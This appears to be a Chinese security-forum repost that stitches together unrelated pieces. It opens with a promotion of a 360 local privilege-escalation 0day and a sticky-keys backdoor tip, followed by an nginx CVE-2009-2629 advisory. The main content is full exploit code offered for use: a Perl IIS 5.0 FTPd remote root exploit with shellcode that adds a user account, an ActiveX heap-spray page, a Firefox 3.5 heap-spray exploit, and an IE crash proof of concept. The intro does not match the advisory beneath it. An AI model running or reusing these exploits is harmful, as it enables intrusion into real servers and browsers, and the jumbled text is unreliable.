来源:t00ls.net 作者:friddy
前几天是RiSing的本地提权漏洞,这回是360本地提权漏洞.
各位服务器管理员朋友们小心了,这个漏洞我试验了,很好很强大,user权限运行一下,直接获得System的权限,而且是0DAY,官方现在未出补丁。
很Cool….
各位注意把………..
在服务器上,上传这个,shell下运行一下,然后3389登录,5下shift,system权限到手.
影响版本:
Igor Sysoev nginx 0.8.14
Igor Sysoev nginx 0.7.61
Igor Sysoev nginx 0.6.38
Igor Sysoev nginx 0.5.37漏洞描述:
Bugraq ID: 36384
CVE ID:CVE-2009-2629
nginx是一款高性能的HTTP 和反向代理服务器。
nginx处理特殊构建的URIs存在缓冲区溢出,远程攻击者可以利用漏洞以应用程序程序执行任意指令。
当处理特殊构建的URIs时ngx_http_parse_complex_uri()函数存在缓冲区下溢错误,可导致nginx服务器把URI中的数据在分配缓冲区前就写入到堆内存中,可导致以服务进程权限执行任意指令。<*参考
http://www.kb.cert.org/vuls/id/180065
*>
SEBUG安全建议:
厂商解决方案
Debian linux用户可升级到如下版本:
Debian Linux 4.0 ia-32
Debian nginx_0.4.13-2+etch2_i386.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+et ch2_i386.deb
Debian Linux 5.0 hppa
Debian nginx_0.6.32-3+lenny2_hppa.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny2_hppa.deb
Debian Linux 5.0 ia-64
Debian nginx_0.6.32-3+lenny2_ia64.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny2_ia64.deb
Debian Linux 4.0 hppa
Debian nginx_0.4.13-2+etch2_hppa.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+et ch2_hppa.deb
Debian Linux 4.0 sparc
Debian nginx_0.4.13-2+etch2_sparc.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+et ch2_sparc.deb
Debian Linux 4.0 s/390
Debian nginx_0.4.13-2+etch2_s390.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+et ch2_s390.deb
Debian Linux 5.0 arm
Debian nginx_0.6.32-3+lenny2_arm.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny2_arm.deb
Debian Linux 4.0 powerpc
Debian nginx_0.4.13-2+etch2_powerpc.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+et ch2_powerpc.deb
Debian Linux 4.0 mipsel
Debian nginx_0.4.13-2+etch2_mipsel.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+et ch2_mipsel.deb
Debian Linux 5.0 alpha
Debian nginx_0.6.32-3+lenny2_alpha.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny2_alpha.deb
Debian Linux 5.0 amd64
Debian nginx_0.6.32-3+lenny2_amd64.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny2_amd64.deb
Debian Linux 5.0 ia-32
Debian nginx_0.6.32-3+lenny2_i386.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny2_i386.deb
Debian Linux 5.0 mips
Debian nginx_0.6.32-3+lenny2_mips.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny2_mips.deb
Debian Linux 5.0 mipsel
Debian nginx_0.6.32-3+lenny2_mipsel.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny2_mipsel.deb
Debian Linux 5.0 powerpc
Debian nginx_0.6.32-3+lenny2_powerpc.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny2_powerpc.deb
Debian Linux 4.0 ia-64
Debian nginx_0.4.13-2+etch2_ia64.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+et ch2_ia64.deb
Debian Linux 4.0 mips
Debian nginx_0.4.13-2+etch2_mips.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+et ch2_mips.deb
Debian Linux 5.0 sparc
Debian nginx_0.6.32-3+lenny2_sparc.deb
http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny2_sparc.deb
# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 – KEEP THIS 0DAY PRIV8
use IO::Socket;
$|=1;
#metasploit shellcode, adduser "winown:nwoniw"
$sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30" .
"\x43\x30\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55" .
"\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b" .
"\x51\x4f\x51\x30\x43\x31\x4a\x4b\x47\x39\x4c\x4b\x47\x44" .
"\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49\x50\x4c\x59\x4e\x4c" .
"\x4c\x44\x49\x50\x44\x34\x43\x37\x49\x51\x49\x5a\x44\x4d" .
"\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x51\x44\x46\x44" .
"\x43\x34\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x51\x34\x43\x31" .
"\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f" .
"\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45\x51" .
"\x4a\x4b\x4b\x39\x51\x4c\x46\x44\x44\x44\x48\x43\x51\x4f" .
"\x46\x51\x4c\x36\x43\x50\x50\x56\x45\x34\x4c\x4b\x50\x46" .
"\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c" .
"\x4e\x4d\x4c\x4b\x42\x48\x45\x58\x4d\x59\x4a\x58\x4c\x43" .
"\x49\x50\x43\x5a\x46\x30\x43\x58\x4c\x30\x4c\x4a\x44\x44" .
"\x51\x4f\x43\x58\x4a\x38\x4b\x4e\x4d\x5a\x44\x4e\x50\x57" .
"\x4b\x4f\x4a\x47\x42\x43\x42\x4d\x45\x34\x46\x4e\x42\x45" .
"\x44\x38\x43\x55\x47\x50\x46\x4f\x45\x33\x47\x50\x42\x4e" .
"\x42\x45\x43\x44\x51\x30\x44\x35\x44\x33\x45\x35\x44\x32" .
"\x51\x30\x43\x47\x43\x59\x42\x4e\x42\x4f\x43\x47\x42\x4e" .
"\x51\x30\x42\x4e\x44\x37\x42\x4f\x42\x4e\x45\x39\x43\x47" .
"\x47\x50\x46\x4f\x51\x51\x50\x44\x47\x34\x51\x30\x46\x46" .
"\x51\x36\x51\x30\x42\x4e\x42\x45\x44\x34\x51\x30\x42\x4c" .
"\x42\x4f\x43\x53\x45\x31\x42\x4c\x42\x47\x43\x42\x42\x4f" .
"\x43\x45\x42\x50\x47\x50\x47\x31\x42\x44\x42\x4d\x45\x39" .
"\x42\x4e\x42\x49\x42\x53\x43\x44\x43\x42\x45\x31\x44\x34" .
"\x42\x4f\x43\x42\x43\x43\x47\x50\x42\x57\x45\x39\x42\x4e" .
"\x42\x4f\x42\x57\x42\x4e\x47\x50\x46\x4f\x47\x31\x51\x54" .
"\x51\x54\x43\x30\x41\x41";
#1ca
print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
if ($#ARGV ne 1) {
print "usage: iiz5.pl
exit(0);
}
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
if (fork()) {
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '21',
Proto => 'tcp');
$patch = "\x7E\xF1\xFA\x7F";
#$retaddr = "ZZZZ";
$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms
$v = "KSEXY" . $sc . "V" x (500-length($sc)-5);
# top address of stack frame where shellcode resides, is hardcoded inside this block
$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53"
."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0";
# attack buffer
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.
($patch x (52/4)) .$patch."EEEE$retaddr".$patch.
"HHHHIIII".
$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN";
$x = <$sock>;
print $x;
print $sock "USER anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "PASS anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "MKD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "CWD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "MKD CCC". "$c\r\n";
$x = <$sock>;
print $x;
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = <$sock>;
print $x;
# TRIGGER
print $sock "NLST $c*/../C*/\r\n";
$x = <$sock>;
print $x;
while (1) {}
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
}
#Cheerio,
#
#Kingcope
# milw0rm.com [2009-08-31]
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 | <!-- http://en.securitylab.ru/poc/extra/382458.php --> <html> <body> <script language="JavaScript"> var shellcode = unescape("evil code"); var array = new Array(); var ls = 0x81000-(shellcode.length*2); var bigblock = unescape("%u0b0c%u0b0C"); while(bigblock.length<ls/2) {bigblock+=bigblock;} var lh = bigblock.substring(0,ls/2); delete bigblock; for(i=0;i<0x99*2;i++) { array[i] = lh + lh + shellcode; } CollectGarbage(); var obj = new ActiveXObject("OWC10.Spreadsheet"); e=new Array(); e.push(1); e.push(2); e.push(0); e.push(window); for(i=0;i<e.length;i++){ for(j=0;j<10;j++){ try{ obj.Evaluate(e[i]); } catch(e) {} } } window.status=e[3] +''; for(j=0;j<10;j++){ try{ obj.msDataSourceObject(e[3]); } catch(e) {} } </script> </body> </html> |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 | <html> <head> <title>Firefox 3.5 Vulnerability</title> Firefox 3.5 Heap Spray Vulnerabilty </br> Author: SBerry aka Simon Berry-Byrne </br> Thanks to HD Moore for the insight and Metasploit for the payload <div id="content"> <p> <font> </font> </p> <p> <font>Loremipsumdoloregkuw</font></p> <p> <font>Loremipsumdoloregkuwiert</font> </p> <p> <font>Loremikdkw </font> </p> </div> <script language=JavaScript> /* Calc.exe */ var shellcode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" + "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" + "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" + "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" + "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" + "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" + "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" + "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" + "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" + "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" + "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" + "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" + "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" + "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" + "%u652E%u6578%u9000"); /* Heap Spray Code */ oneblock = unescape("%u0c0c%u0c0c"); var fullblock = oneblock; while (fullblock.length<0x60000) { fullblock += fullblock; } sprayContainer = new Array(); for (i=0; i<600; i++) { sprayContainer[i] = fullblock + shellcode; } var searchArray = new Array() function escapeData(data) { var i; var c; var escData=''; for(i=0;i<data.length;i++) { c=data.charAt(i); if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c); escData+=c; } return escData; } function DataTranslator(){ searchArray = new Array(); searchArray[0] = new Array(); searchArray[0]["str"] = "blah"; var newElement = document.getElementById("content") if (document.getElementsByTagName) { var i=0; pTags = newElement.getElementsByTagName("p") if (pTags.length > 0) while (i<pTags.length) { oTags = pTags[i].getElementsByTagName("font") searchArray[i+1] = new Array() if (oTags[0]) { searchArray[i+1]["str"] = oTags[0].innerHTML; } i++ } } } function GenerateHTML() { var html = ""; for (i=1;i<searchArray.length;i++) { html += escapeData(searchArray[i]["str"]) } } DataTranslator(); GenerateHTML() </script> </body> </html> <html><body></body></html> |
Sberry, Compaq
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 | <code>
<html>
<head>
<script language="JavaScript" type="Text/Javascript">
function go()
{
var str =unescape('%u4141');
var finalstr = createInlineBuffer(str, 5150000);
var len = finalstr.length;
document.write(len);
addfav(finalstr);
}
/* Effient in-line creation */
function createInlineBuffer (str, num) {
var i = Math.ceil(Math.log(num) / Math.LN2),
res = str;
do {
res += res;
} while (0 < --i);
return res.slice(0, str.length * num);
}
/* Vulnerable Function */
function addfav(str)
{
if (document.all)
{
window.external.AddFavorite
('http://'+str,'Crash')
}
}
</script>
</head>
<body>
<a href="javascript:go()">Add To Favorites</a>
</body>
</html>
</code> |
